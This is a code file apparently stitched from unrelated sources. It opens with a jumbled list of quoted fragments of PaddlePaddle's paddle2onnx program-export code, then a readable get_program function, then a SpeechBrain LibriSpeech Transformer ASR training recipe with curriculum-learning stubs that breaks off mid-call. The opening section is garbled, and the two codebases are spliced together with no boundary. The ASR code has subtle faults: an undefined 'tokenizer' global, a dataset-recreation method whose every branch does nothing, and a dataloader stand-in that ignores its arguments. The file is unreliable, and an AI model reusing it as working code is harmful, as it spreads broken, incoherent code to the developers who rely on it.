getattr(inner_layer, attr_func, None) if isinstance(static_func,", "input_spec has been used in declarative, which is equal to # @declarative with", "Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. 
# # Licensed under the", "for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is", "but received the type of 'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec,", "output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec,", "type(input_spec)) inner_input_spec = [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif", "core from paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework import Block,", "name of output, and we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs,", "for the specific language governing permissions and # limitations under the License. from", "set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make", "except in compliance with the License. # You may obtain a copy of", "Layer.forward method.\" result_list = [] input_var_names = [ var.name for var in flatten(inputs)", "\" \\ \"When using jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[])", "pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec", "ensure that you have set the auc states to zeros before saving inference", "spec in input_spec: if spec.name is None: # name is None, the input_spec", "\"\") if op.type == 'auc': warnings.warn( \"please ensure that you have set the", "have set the auc states to zeros before saving inference model\" ) break", "\"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict() for var in flatten(outputs): if", "and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec: if var.name", "len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec: if var.name not", "= [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase,", "input 'input_spec' should be None, but received the type of 'input_spec' is %s.\"", "output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program =", "isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable)", "to set auc_states to zeros if the program contains auc op all_ops =", "import inspect import six import paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import", "method.\" result_list = [] input_var_names = [ var.name for var in flatten(inputs) if", "need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names =", "% spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do", "not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec:", 
"getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError( \"If", "input_spec): name_none_error = \"The %s's name is None. \" \\ \"When using jit.save,", "(the \"License\" # you may not use this file except in compliance with", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable", "declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec has been used in", "if output_spec is None: result_list = output_vars_dict.values() elif output_spec is not None and", "shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc) main_program._copy_dist_param_info_from(origin_program) return main_program, feeded_var_names,", "op all_ops = main_program.global_block().ops for op in all_ops: # clear device of Op", "in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' !=", "inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program #", "isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is None: result_list = output_vars_dict.values() elif", "in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else: # prune", "paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard from", "raise ValueError(\"'target_vars' should be a list of Variable.\") main_program = _get_valid_program(main_program) # remind", "functions = dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer, attr_func, None) if", "inner_input_spec = [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var,", "structure # as original input_spec here. 
@dygraph.base.switch_to_static_graph
def get_program(layer, input_spec, output_spec, **configs):
    prog_translator = ProgramTranslator()
    if not prog_translator.enable_to_static:
        raise RuntimeError(
            "The Paddle2onnx doesn't work when setting "
            "ProgramTranslator.enable to False.")
    if not isinstance(layer, Layer):
        raise TypeError(
            "The input of paddle2onnx should be 'Layer', but received "
            "input type is %s." % type(layer))

    inner_layer = layer
    # avoid change user given input_spec
    inner_input_spec = None
    if input_spec is not None:
        for attr_func in dir(inner_layer):
            static_func = getattr(inner_layer, attr_func, None)
            if isinstance(static_func,
                          StaticFunction) and 'forward' != attr_func:
                raise ValueError(
                    "If there are static functions other than 'forward' "
                    "that need to be saved, the input 'input_spec' should "
                    "be None, but received the type of 'input_spec' is %s."
                    % type(input_spec))
        if not isinstance(input_spec, (list, tuple)):
            raise TypeError(
                "The input input_spec should be 'list', but received "
                "input_spec's type is %s." % type(input_spec))
        inner_input_spec = []
        for var in flatten(input_spec):
            if isinstance(var, paddle.static.InputSpec):
                inner_input_spec.append(var)
            elif isinstance(var, (core.VarBase, Variable)):
                inner_input_spec.append(
                    paddle.static.InputSpec.from_tensor(var))
            else:
                # support non-Tensor type in `input_spec`.
                inner_input_spec.append(var)

    extra_var_info = dict()
    functions = dir(inner_layer)
    for attr_func in functions:
        static_func = getattr(inner_layer, attr_func, None)
        if isinstance(static_func, StaticFunction):
            concrete_program = static_func.concrete_program_specify_input_spec(
                inner_input_spec)
        elif 'forward' == attr_func:
            # transform in jit.save, if input_spec is incomplete,
            # declarative will throw error
            # inner_input_spec is list[InputSpec], it should be packed
            # with same structure as original input_spec here.
            if inner_input_spec:
                inner_input_spec = pack_sequence_as(input_spec,
                                                    inner_input_spec)
            static_forward = declarative(
                inner_layer.forward, input_spec=inner_input_spec)
            concrete_program = static_forward.concrete_program
            # the input_spec has been used in declarative, which is equal to
            # @declarative with input_spec and jit.save without input_spec,
            # avoid needless warning
            inner_input_spec = None
        else:
            continue

    input_var_names = _get_input_var_names(concrete_program.inputs,
                                           inner_input_spec)

    # the rule is like [ Get input variables name ]. For output var,
    # we only support VarBase spec, and actually, we only need the
    # var name of output, and we don't recommend to use output_spec
    output_vars = _get_output_vars(concrete_program.outputs, output_spec)

    feeded_var_names = input_var_names
    target_vars = output_vars
    main_program = concrete_program.main_program.clone()
    export_for_deployment = True

    if isinstance(feeded_var_names, six.string_types):
        feeded_var_names = [feeded_var_names]
    elif export_for_deployment:
        if len(feeded_var_names) > 0:
            # TODO(paddle-dev): polish these code blocks
            if not (bool(feeded_var_names) and all(
                    isinstance(name, six.string_types)
                    for name in feeded_var_names)):
                raise ValueError("'feed_var_names' should be a list of str.")

    if isinstance(target_vars, Variable):
        target_vars = [target_vars]
    elif export_for_deployment:
        if not (bool(target_vars) and
                all(isinstance(var, Variable) for var in target_vars)):
            raise ValueError("'target_vars' should be a list of Variable.")

    main_program = _get_valid_program(main_program)

    # remind user to set auc_states to zeros if the program contains auc op
    all_ops = main_program.global_block().ops
    for op in all_ops:
        # clear device of Op
        device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName()
        op._set_attr(device_attr_name, "")
        if op.type == 'auc':
            warnings.warn(
                "please ensure that you have set the auc states to zeros "
                "before saving inference model")
            break

    with program_guard(main_program):
        uniq_target_vars = []
        for i, var in enumerate(target_vars):
            uniq_target_vars.append(var)
        target_vars = uniq_target_vars
    target_var_name_list = [var.name for var in target_vars]

    origin_program = main_program.clone()

    main_program = main_program.clone()
    global_block = main_program.global_block()
    need_to_remove_op_index = []
    for i, op in enumerate(global_block.ops):
        op.desc.set_is_target(False)
        if op.type == "feed" or op.type == "fetch":
            need_to_remove_op_index.append(i)

    for index in need_to_remove_op_index[::-1]:
        global_block._remove_op(index)

    main_program.desc.flush()

    main_program = main_program._prune_with_input(
        feeded_var_names=feeded_var_names, targets=target_vars)
    main_program = main_program._inference_optimize(prune_read_op=True)
    fetch_var_names = [v.name for v in target_vars]

    for target_v in target_vars:
        if not main_program.global_block().has_var(target_v.name):
            main_program.global_block().create_var(
                name=target_v.name,
                shape=target_v.shape,
                dtype=target_v.dtype,
                persistable=target_v.persistable)

    prepend_feed_ops(main_program, feeded_var_names)
    append_fetch_ops(main_program, fetch_var_names)

    main_program.desc._set_version()
    paddle.fluid.core.save_op_version_info(main_program.desc)
    main_program._copy_dist_param_info_from(origin_program)
    return main_program, feeded_var_names, target_vars
# train.py -- LibriSpeech Transformer ASR recipe (SpeechBrain) with
# curriculum-based ordering of the training data.
"""Recipe for training a Transformer ASR system with librispeech.
The system employs an encoder, a decoder, and an attention mechanism
between them. Decoding is performed with (CTC/Att joint) beamsearch
coupled with a neural language model.

To run this recipe, do the following:
> python train.py hparams/transformer.yaml

With the default hyperparameters, the system employs a convolutional
frontend and a transformer. The decoder is based on a Transformer decoder.
Beamsearch coupled with a Transformer language model is used on the top of
decoder probabilities.

The neural network is trained on both CTC and negative-log likelihood
targets and sub-word units estimated with Byte Pairwise Encoding (BPE)
are used as basic recognition tokens. Training is performed on the full
LibriSpeech dataset (960 h).

The best model is the average of the checkpoints from last 5 epochs.

The experiment file is flexible enough to support a large variety of
different systems. By properly changing the parameter files, you can try
different encoders, decoders, tokens (e.g, characters instead of BPE),
training split (e.g, train-clean 100 rather than the full one), and many
other possible variations.

Authors
 * <NAME> 2020
 * <NAME> 2020
 * <NAME> 2020
 * <NAME> 2020
 * <NAME> 2021
"""
import os
import sys
import math
import time
import torch
import numpy as np
from functools import cmp_to_key
from pathlib import Path
import speechbrain as sb
from hyperpyyaml import load_hyperpyyaml
from speechbrain.utils.distributed import run_on_main
from speechbrain.dataio.dataset import (
    DynamicItemDataset,
    FilteredSortedDynamicItemDataset,
)
from speechbrain.dataio.sampler import ReproducibleRandomSampler
from speechbrain.dataio.dataloader import LoopedLoader
from speechbrain.dataio.dataloader import make_dataloader as sb_make_dataloader
from speechbrain.core import Stage
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from tqdm.contrib import tqdm


def make_dataloader(
    dataset, stage, ckpt_prefix="dataloader-", **loader_kwargs,
):
    # TRAIN stage is handled specially.
    # Minimal stand-in that delegates to SpeechBrain's stock factory; it is
    # only exercised by the commented-out debug loop at the bottom of the file.
    dataloader = sb_make_dataloader(dataset, **loader_kwargs)
    return dataloader
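# A quick, hypothetical smoke test for the dataloader factory above: two
# invented utterances collated with SpeechBrain's default PaddedBatch.
def _dataloader_demo():
    data = {
        "utt1": {"sig": torch.randn(16000)},
        "utt2": {"sig": torch.randn(8000)},
    }
    dataset = sb.dataio.dataset.DynamicItemDataset(data)
    dataset.set_output_keys(["id", "sig"])
    loader = make_dataloader(dataset, stage=Stage.TRAIN, batch_size=2)
    return next(iter(loader))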
class ASR(sb.core.Brain):
    """Trainer that iterates epochs and datasets for the purpose of "fitting"
    a set of modules to a set of data, extended with curriculum learning.

    In order to use the ``fit()`` method, one should sub-class the ``Brain``
    class and override any methods for which the default behavior does not
    match the use case. For a simple use case (e.g., training a single model
    with a single dataset) the only methods that need to be overridden are:

    * ``compute_forward()``
    * ``compute_objectives()``

    The example below illustrates how overriding these two methods is done.
    For more complicated use cases, such as multiple modules that need to be
    updated, the following methods can be overridden:

    * ``fit_batch()``
    * ``evaluate_batch()``
    * ``update_average()``

    If the initialization was done with distributed_count > 0 and the
    distributed_backend is ddp, this will generally handle multiprocess logic,
    like splitting the training data into subsets for each device and only
    saving a checkpoint on the main process.

    Arguments
    ---------
    modules : dict of str:torch.nn.Module pairs
        These modules are passed to the optimizer by default if they have
        trainable parameters, and will have ``train()``/``eval()`` called on
        them.
    opt_class : torch.optim class
        A torch optimizer constructor that takes only the list of parameters
        (e.g. a lambda or partial function definition). By default, this will
        be passed all modules in ``modules`` at the beginning of the ``fit()``
        method. This behavior can be changed by overriding the
        ``configure_optimizers()`` method.
    hparams : dict
        Each key:value pair should consist of a string key and a
        hyperparameter that is used within the overridden methods. These will
        be accessible via an ``hparams`` attribute, using "dot" notation:
        e.g., self.hparams.model(x).
    run_opts : dict
        A set of options to change the runtime environment, including

        debug (bool)
            If ``True``, this will only iterate a few batches for all
            datasets, to ensure code runs without crashing.
        debug_batches (int)
            Number of batches to run in debug mode, Default ``2``.
        debug_epochs (int)
            Number of epochs to run in debug mode, Default ``2``.
            If a non-positive number is passed, all epochs are run.
        jit_module_keys (list of str)
            List of keys in ``modules`` that should be jit compiled.
        distributed_count (int)
            Number of devices to run on.
        distributed_backend (str)
            One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``.
        device (str)
            The location for performing computations.
        auto_mix_prec (bool)
            If ``True``, automatic mixed-precision is used.
            Activate it only with cuda.
        max_grad_norm (float)
            Default implementation of ``fit_batch()`` uses
            ``clip_grad_norm_`` with this value. Default: ``5``.
        nonfinite_patience (int)
            Number of times to ignore non-finite losses before stopping.
            Default: ``3``.
        noprogressbar (bool)
            Whether to turn off progressbar when training. Default: ``False``.
        ckpt_interval_minutes (float)
            Amount of time between saving intra-epoch checkpoints, in minutes,
            default: ``15.0``. If non-positive, these are not saved.
    checkpointer : speechbrain.Checkpointer
        By default, this will be used to load checkpoints, and will have the
        optimizer added to continue training if interrupted.
    inter_epoch_dataset_updation : bool
        Whether the dataset must be updated between epochs or not. It is used
        in CL which takes feedback from the model and reshuffles the dataset.
        By default, it is ``False``.
    sortagrad : int
        Number of epochs for which the curriculum-based dataset is used.
        It can take one of three values:

        * ``-1`` - use curriculum learning for all epochs
        * ``0`` - do not use curriculum learning
        * ``n`` - use curriculum learning for ``n`` number of epochs

        By default, it is ``-1``.
    """

    def __init__(
        self,
        modules=None,
        opt_class=None,
        hparams=None,
        run_opts=None,
        checkpointer=None,
        inter_epoch_dataset_updation=False,
        sortagrad=-1,
    ):
        super().__init__(
            modules=modules,
            opt_class=opt_class,
            hparams=hparams,
            run_opts=run_opts,
            checkpointer=checkpointer,
        )
        # save attributes related to curriculum learning
        self.inter_epoch_dataset_updation = inter_epoch_dataset_updation
        self.ordering = self.hparams.ordering
        self.batch_selection = self.hparams.batch_selection
        self.sortagrad = sortagrad
        # create tensorboard summary writer
        self.tensorboard_writer = SummaryWriter(
            self.hparams.output_folder + "/tensorboard"
        )

    def compute_forward(self, batch, stage):
        """Forward computations from the waveform batches to the output
        probabilities."""
        batch = batch.to(self.device)
        wavs, wav_lens = batch.sig
        tokens_bos, _ = batch.tokens_bos

        if stage == sb.Stage.TRAIN:
            if hasattr(self.modules, "env_corrupt"):
                wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
                wavs = torch.cat([wavs, wavs_noise], dim=0)
                wav_lens = torch.cat([wav_lens, wav_lens])
                tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)

        # compute features
        feats = self.hparams.compute_features(wavs)
        current_epoch = self.hparams.epoch_counter.current
        feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)

        if stage == sb.Stage.TRAIN:
            if hasattr(self.hparams, "augmentation"):
                feats = self.hparams.augmentation(feats)

        # forward modules
        src = self.modules.CNN(feats)
        enc_out, pred = self.modules.Transformer(
            src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
        )

        # output layer for ctc log-probabilities
        logits = self.modules.ctc_lin(enc_out)
        p_ctc = self.hparams.log_softmax(logits)

        # output layer for seq2seq log-probabilities
        pred = self.modules.seq_lin(pred)
        p_seq = self.hparams.log_softmax(pred)

        # Compute outputs
        hyps = None
        if stage == sb.Stage.TRAIN:
            hyps = None
        elif stage == sb.Stage.VALID:
            hyps = None
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch % self.hparams.valid_search_interval == 0:
                # for the sake of efficiency, we only perform beamsearch with
                # limited capacity and no LM to give user some idea of
                # how the AM is doing
                hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)
        elif stage == sb.Stage.TEST:
            hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)

        return p_ctc, p_seq, wav_lens, hyps
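    # A minimal, self-contained sketch of the joint CTC/attention objective
    # combined in compute_objectives below (loss = w * ctc + (1 - w) * seq).
    # Shapes, sizes and the raw torch calls are illustrative; the recipe uses
    # the hparams-defined ctc_cost/seq_cost wrappers instead.
    @staticmethod
    def _joint_ctc_attention_sketch(ctc_weight=0.3):
        import torch.nn.functional as F

        T, N, C, U = 50, 2, 30, 10  # time, batch, vocab, target length
        log_probs = torch.randn(T, N, C).log_softmax(dim=-1)
        targets = torch.randint(1, C, (N, U))
        input_lengths = torch.full((N,), T, dtype=torch.long)
        target_lengths = torch.full((N,), U, dtype=torch.long)
        loss_ctc = F.ctc_loss(log_probs, targets, input_lengths, target_lengths)

        # one-step-forward (teacher-forced) decoder predictions
        dec_logits = torch.randn(N, U, C)
        loss_seq = F.cross_entropy(dec_logits.transpose(1, 2), targets)

        return ctc_weight * loss_ctc + (1 - ctc_weight) * loss_seq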
    def compute_objectives(self, predictions, batch, stage):
        """Computes the loss given predictions and targets."""
        (p_ctc, p_seq, wav_lens, hyps,) = predictions

        ids = batch.id
        tokens_eos, tokens_eos_lens = batch.tokens_eos
        tokens, tokens_lens = batch.tokens

        if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
            tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
            tokens_eos_lens = torch.cat(
                [tokens_eos_lens, tokens_eos_lens], dim=0
            )
            tokens = torch.cat([tokens, tokens], dim=0)
            tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)

        loss_seq = self.hparams.seq_cost(
            p_seq, tokens_eos, length=tokens_eos_lens
        )
        loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
        loss = (
            self.hparams.ctc_weight * loss_ctc
            + (1 - self.hparams.ctc_weight) * loss_seq
        )

        if stage != sb.Stage.TRAIN:
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if current_epoch % valid_search_interval == 0 or (
                stage == sb.Stage.TEST
            ):
                # Decode token terms to words
                predicted_words = [
                    tokenizer.decode_ids(utt_seq).split(" ")
                    for utt_seq in hyps
                ]
                target_words = [wrd.split(" ") for wrd in batch.wrd]
                self.wer_metric.append(ids, predicted_words, target_words)

            # compute the accuracy of the one-step-forward prediction
            self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)
        return loss, loss_ctc, loss_seq
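    # Hypothetical sketch of the gradient-accumulation arithmetic used by
    # fit_batch below: with micro-batch size B and gradient_accumulation K,
    # the optimizer effectively sees gradients averaged over B * K examples.
    @staticmethod
    def _grad_accumulation_sketch(grad_accum=4):
        model = torch.nn.Linear(8, 1)
        opt = torch.optim.SGD(model.parameters(), lr=0.1)
        for step in range(1, 9):
            loss = model(torch.randn(2, 8)).pow(2).mean()
            (loss / grad_accum).backward()  # normalize like the recipe
            if step % grad_accum == 0:      # update every K micro-batches
                opt.step()
                opt.zero_grad()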
    def fit_batch(self, batch):
        """Train the parameters given a single batch in input"""
        # check if we need to switch optimizer
        # if so change the optimizer from Adam to SGD
        self.check_and_reset_optimizer()

        predictions = self.compute_forward(batch, sb.Stage.TRAIN)
        loss, loss_ctc, loss_seq = self.compute_objectives(
            predictions, batch, sb.Stage.TRAIN
        )

        # normalize the loss by gradient_accumulation step
        (loss / self.hparams.gradient_accumulation).backward()

        if self.step % self.hparams.gradient_accumulation == 0:
            # gradient clipping & early stop if loss is not finite
            self.check_gradients(loss)

            self.optimizer.step()
            self.optimizer.zero_grad()

            # anneal lr every update
            self.hparams.noam_annealing(self.optimizer)

        return loss.detach(), loss_ctc.detach(), loss_seq.detach()

    def evaluate_batch(self, batch, stage):
        """Computations needed for validation/test batches"""
        with torch.no_grad():
            predictions = self.compute_forward(batch, stage=stage)
            loss, _, _ = self.compute_objectives(
                predictions, batch, stage=stage
            )
        return loss.detach()

    def on_stage_start(self, stage, epoch):
        """Gets called at the beginning of each epoch"""
        if stage != sb.Stage.TRAIN:
            self.acc_metric = self.hparams.acc_computer()
            self.wer_metric = self.hparams.error_rate_computer()
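    # Sketch of the two-stage optimization schedule implemented by
    # check_and_reset_optimizer/on_fit_start below: Adam with Noam annealing
    # for the first stage_one_epochs epochs, then plain SGD. The defaults
    # here are illustrative, not taken from the hparams file.
    @staticmethod
    def _optimizer_schedule_sketch(stage_one_epochs=40, total_epochs=50):
        return {
            epoch: ("Adam" if epoch <= stage_one_epochs else "SGD")
            for epoch in range(1, total_epochs + 1)
        }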
    def on_stage_end(self, stage, stage_loss, epoch):
        """Gets called at the end of a epoch."""
        # Compute/store important stats
        stage_stats = {"loss": stage_loss}
        if stage == sb.Stage.TRAIN:
            self.train_stats = stage_stats
        else:
            stage_stats["ACC"] = self.acc_metric.summarize()
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                stage_stats["WER"] = self.wer_metric.summarize("error_rate")

        # log stats and save checkpoint at end-of-epoch
        if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
            # report different epoch stages according current stage
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch <= self.hparams.stage_one_epochs:
                lr = self.hparams.noam_annealing.current_lr
                steps = self.hparams.noam_annealing.n_steps
                optimizer = self.optimizer.__class__.__name__
            else:
                lr = self.hparams.lr_sgd
                steps = -1
                optimizer = self.optimizer.__class__.__name__

            epoch_stats = {
                "epoch": epoch,
                "lr": lr,
                "steps": steps,
                "optimizer": optimizer,
            }
            self.hparams.train_logger.log_stats(
                stats_meta=epoch_stats,
                train_stats=self.train_stats,
                valid_stats=stage_stats,
            )
            self.checkpointer.save_and_keep_only(
                meta={"ACC": stage_stats["ACC"], "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=5,
            )

        elif stage == sb.Stage.TEST:
            self.hparams.train_logger.log_stats(
                stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
                test_stats=stage_stats,
            )
            with open(self.hparams.wer_file, "w") as w:
                self.wer_metric.write_stats(w)

            # save the averaged checkpoint at the end of the evaluation stage
            # delete the rest of the intermediate checkpoints
            # ACC is set to 1.1 so checkpointer only keeps the averaged
            # checkpoint
            self.checkpointer.save_and_keep_only(
                meta={"ACC": 1.1, "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=1,
            )

    def recreate_train_dataset(self, epoch):
        """Gets called at the end of a epoch. This is used to handle whether
        the dataset needs to be reshuffled at the end of the epoch.
        """
        if self.inter_epoch_dataset_updation:
            if self.sortagrad != -1:
                # number of epochs for which curriculum based
                # dataset is used is defined
                if self.sortagrad < epoch:
                    # recreate dataset using random shuffling
                    return
                else:
                    # recreate dataset using preferred cl approach
                    return
        else:
            if self.sortagrad != -1:
                # number of epochs for which curriculum based
                # dataset is used is defined
                if self.sortagrad < epoch:
                    # recreate dataset using random shuffling
                    return
            else:
                return

    def check_and_reset_optimizer(self):
        """reset the optimizer if training enters stage 2"""
        current_epoch = self.hparams.epoch_counter.current
        if not hasattr(self, "switched"):
            self.switched = False
            if isinstance(self.optimizer, torch.optim.SGD):
                self.switched = True

        if self.switched is True:
            return

        if current_epoch > self.hparams.stage_one_epochs:
            self.optimizer = self.hparams.SGD(self.modules.parameters())

            if self.checkpointer is not None:
                self.checkpointer.add_recoverable("optimizer", self.optimizer)

            self.switched = True

    def on_fit_start(self):
        """Initialize the right optimizer on the training start"""
        super().on_fit_start()

        # if the model is resumed from stage two, reinitialize the optimizer
        current_epoch = self.hparams.epoch_counter.current
        current_optimizer = self.optimizer
        if current_epoch > self.hparams.stage_one_epochs:
            del self.optimizer
            self.optimizer = self.hparams.SGD(self.modules.parameters())

            # Load latest checkpoint to resume training if interrupted
            if self.checkpointer is not None:
                # do not reload the weights if training is interrupted
                # right before stage 2
                group = current_optimizer.param_groups[0]
                if "momentum" not in group:
                    return

                self.checkpointer.recover_if_possible(
                    device=torch.device(self.device)
                )

    def on_evaluate_start(self, max_key=None, min_key=None):
        """perform checkpoint average if needed"""
        super().on_evaluate_start()

        ckpts = self.checkpointer.find_checkpoints(
            max_key=max_key, min_key=min_key
        )
        ckpt = sb.utils.checkpoints.average_checkpoints(
            ckpts, recoverable_name="model", device=self.device
        )

        self.hparams.model.load_state_dict(ckpt, strict=True)
        self.hparams.model.eval()
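    # Minimal sketch of what sb.utils.checkpoints.average_checkpoints does for
    # on_evaluate_start above: the kept checkpoints' model state dicts are
    # averaged elementwise (floating-point parameters assumed).
    @staticmethod
    def _average_state_dicts_sketch(state_dicts):
        return {
            key: sum(sd[key] for sd in state_dicts) / len(state_dicts)
            for key in state_dicts[0]
        }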
    def fit(
        self,
        epoch_counter,
        train_set,
        valid_set=None,
        progressbar=None,
        train_loader_kwargs={},
        valid_loader_kwargs={},
    ):
        """Iterate epochs and datasets to improve objective.

        Relies on the existence of multiple functions that can (or should) be
        overridden. The following methods are used and expected to have a
        certain behavior:

        * ``fit_batch()``
        * ``evaluate_batch()``
        * ``update_average()``

        If the initialization was done with distributed_count > 0 and the
        distributed_backend is ddp, this will generally handle multiprocess
        logic, like splitting the training data into subsets for each device
        and only saving a checkpoint on the main process.

        Arguments
        ---------
        epoch_counter : iterable
            Each call should return an integer indicating the epoch count.
        train_set : Dataset, DataLoader
            A set of data to use for training. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given,
            it is used directly.
        valid_set : Dataset, DataLoader
            A set of data to use for validation. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given,
            it is used directly.
        train_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the train_loader
            (if train_set is a Dataset, not DataLoader). E.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        valid_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the valid_loader
            (if valid_set is a Dataset, not DataLoader). E.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        progressbar : bool
            Whether to display the progress of each epoch in a progressbar.
        """
        if not (
            isinstance(train_set, DataLoader)
            or isinstance(train_set, LoopedLoader)
        ):
            train_set = self.make_dataloader(
                train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs
            )
        if valid_set is not None and not (
            isinstance(valid_set, DataLoader)
            or isinstance(valid_set, LoopedLoader)
        ):
            valid_set = self.make_dataloader(
                valid_set,
                stage=sb.Stage.VALID,
                ckpt_prefix=None,
                **valid_loader_kwargs,
            )

        self.on_fit_start()

        self.train_set = train_set
        total_steps = len(train_set)

        if progressbar is None:
            progressbar = not self.noprogressbar

        # Iterate epochs
        for epoch in epoch_counter:
            # Training stage
            self.on_stage_start(Stage.TRAIN, epoch)
            self.modules.train()

            # Reset nonfinite count to 0 each epoch
            self.nonfinite_count = 0

            if self.train_sampler is not None and hasattr(
                self.train_sampler, "set_epoch"
            ):
                self.train_sampler.set_epoch(epoch)

            # Time since last intra-epoch checkpoint
            last_ckpt_time = time.time()

            # Only show progressbar if requested and main_process
            enable = progressbar and sb.utils.distributed.if_main_process()
            completed_steps = (epoch - 1) * total_steps
            with tqdm(
                self.train_set,
                initial=self.step,
                dynamic_ncols=True,
                disable=not enable,
            ) as t:
                for batch in t:
                    self.step += 1
                    global_step = completed_steps + self.step
                    loss, loss_ctc, loss_seq = self.fit_batch(batch)
                    self.avg_train_loss = self.update_average(
                        loss, self.avg_train_loss
                    )
                    t.set_postfix(train_loss=self.avg_train_loss)

                    # Write train summary to tensorboard
                    # (tag mirrors the validation ones below)
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/tot_loss", loss, global_step
                    )

                    # Debug mode only runs a few batches
                    if self.debug and self.step == self.debug_batches:
                        break

                    if (
                        self.checkpointer is not None
                        and self.ckpt_interval_minutes > 0
                        and time.time() - last_ckpt_time
                        >= self.ckpt_interval_minutes * 60.0
                    ):
                        run_on_main(self._save_intra_epoch_ckpt)
                        last_ckpt_time = time.time()

            # Run train "on_stage_end" on all processes
            self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch)
            self.avg_train_loss = 0.0
            self.step = 0

            # Validation stage
            if valid_set is not None:
                self.on_stage_start(Stage.VALID, epoch)
                self.modules.eval()
                avg_valid_loss = 0.0
                with torch.no_grad():
                    for batch in tqdm(
                        valid_set, dynamic_ncols=True, disable=not enable
                    ):
                        self.step += 1
                        loss = self.evaluate_batch(batch, stage=Stage.VALID)
                        avg_valid_loss = self.update_average(
                            loss, avg_valid_loss
                        )

                        # Debug mode only runs a few batches
                        if self.debug and self.step == self.debug_batches:
                            break

                    # Write validation summary to tensorboard
                    self.tensorboard_writer.add_scalar(
                        "Validation/Loss/tot_loss", avg_valid_loss, epoch
                    )
                    self.tensorboard_writer.add_scalar(
                        "Validation/Accuracy/tot_acc",
                        self.acc_metric.summarize(),
                        epoch,
                    )

                    # Only run validation "on_stage_end" on main process
                    self.step = 0
                    run_on_main(
                        self.on_stage_end,
